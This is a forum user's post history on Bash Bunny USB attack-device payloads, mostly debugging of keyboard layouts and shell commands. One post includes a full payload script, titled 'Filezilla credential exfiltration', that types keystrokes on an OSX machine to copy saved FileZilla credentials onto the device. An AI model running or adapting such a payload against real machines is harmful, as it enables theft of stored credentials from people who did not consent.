Jump to content

quentin.lamamy

Active Members
  • Posts

    93
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by quentin.lamamy

  1. This issue exist only in the case you try to print some particular character. Someone get the same issue and send me a PM
  2. In your payload add GET SWITCH_POSITION and check the value of $SWITCH_POSITION please
  3. nop my final payload don't use it. It's just some test. I do a lot of test, try a lot of way to make the same thing.I want to make an developer oriented documentation for the wiki.
  4. well, the mechanic switch is OK, you can use the 3 position ?
  5. I am on OSX and i need to create a new keyboard layout for the mac keyboard. Does someone know how to create it ?
  6. issue solved, i have to create a new json that match the osx keyboard layout (i don't know how but i need), until i learn how to create a new keyboard layout i just change the system keyboard layout to a classic FR PC Azerty
  7. Don't work anymore , Whaaaaaaat ! . Welllll, does something change in the new firmware ??? DUCKY_LANG fr [...] Q STRING printf '\e[2t' Q ENTER Result printf ¡e{2t
  8. Yes all this classic command will work, i try all the "uncommon" command and try them to help the future BB noob like me Next unix command test : export export FOO="BAR" Q STRING $FOO # Will print, as expected BAR in the current focused window export PS1="bashbunny>" # Will do nothing I have little idea on why it don't change my terminal prompt, it may be a kind of scope issue. Something like the var is set for the actual running script on the BB and not for the current opened terminal. I use to success to make this work with Q STRING en Q ENTER, but now it sucks with some encoding issue # Print this command in terminal in order to be in the "good scope" Q STRING "export PS1='bashbunny >'" Q ENTER but the unexpected result is export PS1-'bashbunny #' encoding PB solve with a new OSX keyboard layout
  9. Yes, i know it sucks to do this way, now i use /root/udisk. At the moment i have tested 2 unix command that works, mkdir and source
  10. I will be happy to help you, but please use one topic for one subject, it will help people in the future.
  11. If the character is on your keyboard layout you have to set the keyboard layout in your script DUCKY_LANG fr and add the right json according to your keyboard layout in the language folder If the character is not on your keyboard i think it's possible to use the ascii or the hexa code, but you have to wait for a more skilled BB user to have this info.
  12. i think there is one, but i don't have the answer. Please wait for someone else who have more hardware BB skill
  13. Hi, If i good understand you need to use the Ñ character ?
  14. after the solid green (means that bb is rebooting) you have to wait for a blue blinking Here is the procedure. It seems that you unplug it during the reboot, i think you brick your BB. I'm still a kind of BB noob and have no more info for you. Wait for a BB god to have more info
  15. What was the process step by step you use to upgrade ? In which mode are you when you plug your BB ? Arming ?
  16. It seems that you can restore your BB https://forums.hak5.org/index.php?/topic/40293-i-may-killed-it/#comment-287106, never test
  17. Just try and yes tadaa i have my folder, but in my case it don't work ? #!/bin/bash ############################################################################### # _____ _____ _____ _____ _____ _____ _____ _____ __ __ # # (\___/) | __ || _ || __|| | | | __ || | || | || | || | | # # (='.'=) | __ -|| ||__ || | | __ -|| | || | | || | | ||_ _| # # (")_(") |_____||__|__||_____||__|__| |_____||_____||_|___||_|___| |_| # # Bash Bunny by Hak5 USB Attack/Automation Platform # # # ############################################################################### # # # Title: Filezilla credential exfiltration # # Author: Quentin Lamamy <contact@quentin-lamamy.fr> # # Description Exfiltrate filezilla credential # # Version: 1.0 # # Platform OSX # # # ############################################################################### ##################### # Setup the payload # ##################### LED SETUP rootDir=/Volumes/BashBunny lootDir=$rootDir/loot/exfiltration/filezilla DUCKY_LANG fr GET SWITCH_POSITION ATTACKMODE HID STORAGE ##################### # Attack the target # ##################### LED ATTACK Q CTRL SPACE Q STRING terminal Q ENTER Q STRING source $rootDir/payloads/$SWITCH_POSITION/shell.sh Q ENTER Q STRING shell.init Q ENTER Q STRING mkdir -p $lootDir Q ENTER Q STRING source $rootDir/payloads/$SWITCH_POSITION/filezillaExfiltration.sh; Q ENTER Q STRING filezilla.exfiltration $lootDir Q ENTER #Q STRING clear #Q ENTER QUACK STRING source $rootDir/payloads/$SWITCH_POSITION/footer.sh QUACK ENTER # Close terminal #QUACK STRING killall Terminal #QUACK ENTER LED FINISH ################################################################################# # (\___/) Find further documentation, repository of payloads, (\___/) # # (='.'=) tutorial videos and community support forums at (='.'=) # # (")_(") bashbunny.com. (C) Hak5 LLC (")_(") # ################################################################################# cp: /Volumes/BashBunny/loot/exfiltration/filezilla/quentin_sitemanager.xml: No such file or directory It's not the better way to do QUACK mkdir ..... and QUACK ENTER, but it should work no ?
  18. Yes here is my complete payload hearder LED SETUP rootDir=/Volumes/BashBunny lootDir=$rootDir/loot/exfiltration/ DUCKY_LANG fr GET SWITCH_POSITION ATTACKMODE HID STORAGE
  19. Here is the result of some test TEST 1 : Print the command in shell and press enter rootDir=/Volumes/BashBunny lootDir=$rootDir/loot/exfiltration/ [...] Q STRING mkdir -p $lootDir Q ENTER The result : No folder creation and this result in the console bashbunny> mkdir §p /Volumes/BashBunny/loot/exfiltration/ mkdir: §p: File exists Why this error ? Don't know because the file doesn't exist, And why my mkdir -p become mkdir: §p ?
  20. well... thks but what is the link with the question ? ^^
  21. it's just in my switch1 folder like any other payload (not in serial console) And i test this weird path because i see it in this payload (when i don't have enough documentation or data, i try to learn from the existing script). But it seems that it's not the good way to create a folder (before moving file inside during exfiltration)
  22. Ok, hoist the white flag xD I just try try this command mkdir -p /root/udisk/loot/exfiltration nothing, no folder, a total void ^^ but if i use this command Q STRING mkdir -p /Volumes/BashBunny/loot/exfiltration Q ENTER it work's \o/ for me it's the same, i just want to understand where is my mistake. Thks
  23. Thks for the tutorial... and the respect..... I'm not aware of the internal software and hardware of the BB. Just tell me that bb is a linux computer in a USB key, it's enough , i don't need help to know the command list available on unix, and i don't need your disdain.
×
×
  • Create New...